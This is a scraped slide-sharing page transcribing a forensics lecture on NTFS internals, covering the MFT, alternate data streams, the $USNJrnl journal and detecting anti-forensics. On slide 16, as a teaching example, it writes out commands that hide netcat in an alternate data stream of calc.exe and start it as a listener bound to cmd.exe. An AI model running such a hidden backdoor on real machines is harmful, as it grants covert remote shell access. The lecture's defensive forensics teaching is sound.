Presentation is loading. Please wait.

Presentation is loading. Please wait.

NTFS.

Published byIda Frederiksen Modified over 6 years ago

Similar presentations

Presentation on theme: "NTFS."— Presentation transcript:

1 NTFS

2 Overview History and Usage NTFS Structure MFT Alternate Data Streams
Writing to and reading from Example backdoors $USNJrnl Additional Research Suggestions

3 History and Usage Created by Microsoft to provide many features not available in a FAT file system. Journaling Security Features Larger Volume Support Other performance and space saving enhancements Supported by Windows NT 4.0, Windows Server 2000, and above Used for hard disks Previously could only be used for hard disks but now works on flash drives and removable media The default file system your Windows OS resides in

4 NTFS Structure Clusters on an NTFS volume are numbered sequentially from the beginning of the partition into logical cluster numbers. NTFS stores all objects in the file system using a record called the Master File Table (MFT), similar in structure to a database.

5 NTFS Structure NTFS Boot Sector - Contains the BIOS parameter block that stores information about the layout of the volume and the file system structures, as well as the boot code (MBR). Master File Table - Contains the information necessary to retrieve files from the NTFS partition, such as the attributes of a file. File System Data - Stores data that is not contained within the Master File Table. Master File Table Copy - Includes copies of the records essential for the recovery of the file system if there is a problem with the original copy. NTFS Boot Sector Master File Table File System Data Mater File Table (Copy)

6 MFT The Master File Table (MFT) contains entries that describe all system files, user files, and directories. The MFT even contains an entry (#0) that describes the MFT itself, which is how we determine its current size. Other system files in the MFT include the Root Directory (#5), the cluster allocation map, Security Descriptors, and the journal.

7 MFT Entries Each MFT Entry is given a number. The user files and directories start at MFT #25 Contains attribute information MAC times File Name $DATA stream (File content) Index Alloc and Index root which contain directory contents stored in a B-Tree

8 MFT Entries Each type of attribute is given a numerical value and more than one instance of a type can exist for a file. The "id" value for each attribute allows one to specify an instance. A given file can have more than one "$Data" attribute. To get a mapping of attribute type values to name, use the 'fsstat' command. It displays the contents of the $AttrDef system file.

9 MFT Entries Standard Information File or Directory Name Data or Index
Unused Space

10 MFT Entry Type Identifiers
The output of fls will often show the inode of a file on a NTFS volume as <inode> This represents a $DATA stream at <inode> and it’s the 0th $DATA stream. Similarly <inode> contains the raw $STANDARD_INFORMATION type data for that file.

11 MFT Parsing Sleuthkit Use fls to list files and streams
Use istat to list MFT entry data about a specific file analyzemft.py icat -o1 disk.img 0 > mft.data Analyzemft.py -f mft.data -o mft.csv mft.pl mft.pl mft.data #dumps parsed data to stdout

12 MFT Additional Information Directory Structures
File names and MFT entry pointers stored as an alphabetically sorted B-Tree MFT entry also stores the metadata address of the parent directory’s MFT entry

13 MFT Deleted Files When a file is deleted, several things occur. The MFT entry has a flag that is set to "unused" and the bitmap for the MFT entries is updated. The bitmap for the clusters is also updated, if needed. Complex removal from the sorted name tree (This is what makes it sometimes hard to recover a file name of a deleted file stored on an NTFS volume) To find the deleted files for a specific parent directory, the MFT entry of the directory is determined and the MFT is scanned to find all unallocated entries that reference that directory as its parent directory. The file name is stored in the MFT entry so the full path can be determined using the path of the parent directory and the name stored in the file's MFT entry. (*Note Sleuthkit’s fls does this for you)

14 Alternate Data Streams
Why do they exist? The need to add "extra" information to the files without altering the original file format or content. For example, one file stream could hold the security information for the file such as access permissions while another one could hold data that describes the purpose of the file, its author and the MAC times. $USNJrnl is an example of a “legit” use of ADS

15 Alternate Data Streams
Things to Know About ADS There is no limit on the size of the streams (It is not even reported on most OSes) Streams can be attached not only to files but also to folders and drives Any stream of binary information can constitute a file (jpeg, executables, etc.) ADS have no attributes of their own (permissions stay the same) In the past antivirus software wouldn’t scan these streams. You should probably make sure yours does. It is possible for a user with appropriate permissions to add streams to system files You have to use special tools to detect ADS streams In some cases streams have been used to remotely exploit a web server. *Not very likely today

16 Alternate Data Streams
How to create a stream Windows type c:\nc.exe > C:\windows\system32\calc.exe:svchost.exe Fork netcat program into calc.exe as ADS called svchost.exe In this example a backdoor is created and someone with access to the machine can run the following command to enable the backdoor. start /B C:\windows\system32\calc.exe:svchost.exe -d - L -p e cmd.exe echo “HIDDEN” > test.txt:hidden.txt

17 Alternate Data Streams
How to create a stream Linux sudo mount -tntfs-3g -o gid=$USER,uid=$USER,user_xattr /dev/loop0p1 ~/mnt cat /bin/nc | attr -s "hidden.bin" ~/mnt/test.txt echo "HIDDEN" | attr -s "hidden.txt" ~/mnt/test.txt #many ways to do this

18 Alternate Data Streams
How to detect a ADS Windows Sysinternals using the “Streams” utility Many other GUI based applications Proprietary Software like EnCase dir /R

19 Alternate Data Streams
How to detect a ADS Linux Autopsy (GUI create by makers of sleuthkit to be similar to something like EnCase) istat (You need to do this one inode at a time) Maybe iterate through all inodes then cal istat fls fls -r -p -o1 disk.img | grep -e ':.*:' #this might work for you

20 Alternate Data Streams
How to dump contents of ADS Windows notepad test.txt:hiddent.txt #type command doesn’t work for this save as hidden.txt powershell Get-Content -s hidden.txt test.txt

21 Alternate Data Streams
How to dump contents of ADS Linux sudo mount -tntfs-3g -o gid=$USER,uid=$USER,streams_interface='windows' /dev/loop0p1 ~/mnt cat test.txt:hidden.txt > hidden.txt

22 Alternate Data Streams
How to delete ADS Windows streams -d test.txt #Delete all streams except file stream Powershell Remove-Item -s hidden.txt test.txt Linux sudo mount -tntfs-3g -o gid=$USER,uid=$USER,user_xattr /dev/loop0p1 ~/mnt rm ~/mnt/test.txt:hidden.txt

23 $USNJournal Update Sequence Number Journal File - While the different file operations occur on disk, in a NTFS volume, the change journal keeps record of the reason behind the operation such as file creation, deletion, encryption, directory creation, deletion, etc. Applications and Administrators can create, delete, and re-create change journals. There is a USN change journal per volume and is turned on by default since windows Vista The per volume $USNJournal is located at $EXTEND/$USNJournal

24 $USNJournal Behavior Does not overwrite records like the $LogFile does
Allocates and Deallocates as it grows This means we may find records in unallocated space Contains two ADS $MAX - Information about the change journal such as the maximum size $J - The contents of the change journal Includes information such as date and time of change, reason for change, MFT Entry, MFT parent entry, and others

25 $USNJournal Read from the stream Windows
USN-Record-Carver UsnJrnl2Csv Linux usnjls #extract and parse in multiple formats usnj.pl #parse extracted journal and output as csv Use fls and icat to dump $USNJournal $J stream

26 $USNJournal Using USNJournal to detect Anti-forensics
Data in Obscure Locations Malware will often insert itself in obscure locations where the user is not likely to see the files The recycling bin is a popular choice for this If we know a time frame to look for suspicious activity the USNJrnl can show us where files were hidden Example: Intrusion Detection System alerts on a trojan. USNJrnl can tell us where the trojan installed itself by looking for file activity immediately after alert

27 $USNJournal Using USNJournal to detect Anti-forensics Data Destruction
Often malware will write a new file that then deletes the original file which “dropped” the malware on the system USNJrnl can help us reconstruct this chain of events. Time Stomping Malware or malicious actors can overwrite the MFT metadata Change timestamps to obfuscate actions USNJrnl provides a second set of timestamps for comparison.

28 $USNJournal Using USNJournal to detect Anti-forensics
File System Tunneling - if a file is renamed or deleted and then if a file with the same name is created in the same directory then the new file will retain the timestamps from the old file. Microsoft's Reasoning: enable compatibility with programs that rely on file systems being able to hold onto file meta-info for a short period of time. This occurs after deletion or renaming and re-introducing a new directory entry with that meta-info (if a create or rename occurs to cause a file of that name to appear again in a short period of time).” Used in malware sometimes or if you want to “prove” to your instructor you actually did your homework before the due date but forgot to submit it. (NOT RECOMMENDED, esp. in this class)

29 $USNJournal Using USNJournal to detect Anti-forensics
File System Tunneling For Example: Malware could rename services.exe and within a fraction of a second create a new services.exe file in the same directory The file timestamp would have the same SIA and FNA timestamp as the original services.exe file. (SIA = Standard Information Attribute, FNA = Filename Attribute, can be viewed using istat) However the USNJrnl entry for this file would show the “true” creation date.

30 Additional Research Suggestions
$LogFile - metadata file, which keeps record of all operations that occurred in the NTFS volume Tools exist to parse this file on Windows. This might be a project idea for a version that works on Linux Sometimes contains information not found in the USNJrnl Read some advanced data recovery techniques in academic paper format at:

31 Questions?

32 Relevant Links

33 Relevant Links If you really want to learn about $USNJournal Structure
was-infected-with.html If you really want to test your data recovery skills For all you who are academics

Download ppt "NTFS."

Similar presentations

NTFS - The workhorse file system for the Windows Platform

NTFS - The workhorse file system for the Windows Platform
COMP091 – Operating Systems 1

COMP091 – Operating Systems 1
Computer Forensics NTFS File System.

Computer Forensics NTFS File System.
File Systems Examples.

File Systems Examples.
The Sleuth Kit Brian Carrier Set of tools to analyze device images.

The Sleuth Kit Brian Carrier Set of tools to analyze device images.
Ext2/Ext3 Linux File System Reporter: Po-Liang, Wu.

Ext2/Ext3 Linux File System Reporter: Po-Liang, Wu.
File System Analysis.

File System Analysis.
1 EXT4NTFS 6FAT32 Allocation method IndexedIndexed, by “runs”Linked File representation i-node (default size 256KB) MFT record (default size 1Kb) Chain.

1 EXT4NTFS 6FAT32 Allocation method IndexedIndexed, by “runs”Linked File representation i-node (default size 256KB) MFT record (default size 1Kb) Chain.
70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment Chapter 5: Managing File Access.

70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment Chapter 5: Managing File Access.
Lecture 10: The FAT, VFAT, and NTFS Filesystems 6/17/2003 CSCE 590 Summer 2003.

Lecture 10: The FAT, VFAT, and NTFS Filesystems 6/17/2003 CSCE 590 Summer 2003.
70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment, Enhanced Chapter 7: Advanced File System Management.

70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment, Enhanced Chapter 7: Advanced File System Management.
1 File Management in Representative Operating Systems.

1 File Management in Representative Operating Systems.
Wince File systems. File system on embedded File system choice on embedded is important –File system size can be an issue –Different media are used –

Wince File systems. File system on embedded File system choice on embedded is important –File system size can be an issue –Different media are used –
70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment Chapter 7: Advanced File System Management.

70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment Chapter 7: Advanced File System Management.
Hard Drive Formatting 1. Formatting Once a hard drive has been partitioned, there’s one more step you must perform before your OS can use that drive:

Hard Drive Formatting 1. Formatting Once a hard drive has been partitioned, there’s one more step you must perform before your OS can use that drive:
Tasks Necessary for Setting Up a Hard Disk Initializing the disk with basic or dynamic storage type Creating partitions on basic disks or volumes on dynamic.

Tasks Necessary for Setting Up a Hard Disk Initializing the disk with basic or dynamic storage type Creating partitions on basic disks or volumes on dynamic.
New Technologies File System

New Technologies File System
70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment, Enhanced Chapter 7: Advanced File System Management.

70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment, Enhanced Chapter 7: Advanced File System Management.
Mastering Windows Network Forensics and Investigation Chapter 7: Windows File Systems.

Mastering Windows Network Forensics and Investigation Chapter 7: Windows File Systems.
Chapter 8 File Management

Chapter 8 File Management

Similar presentations

Ads by Google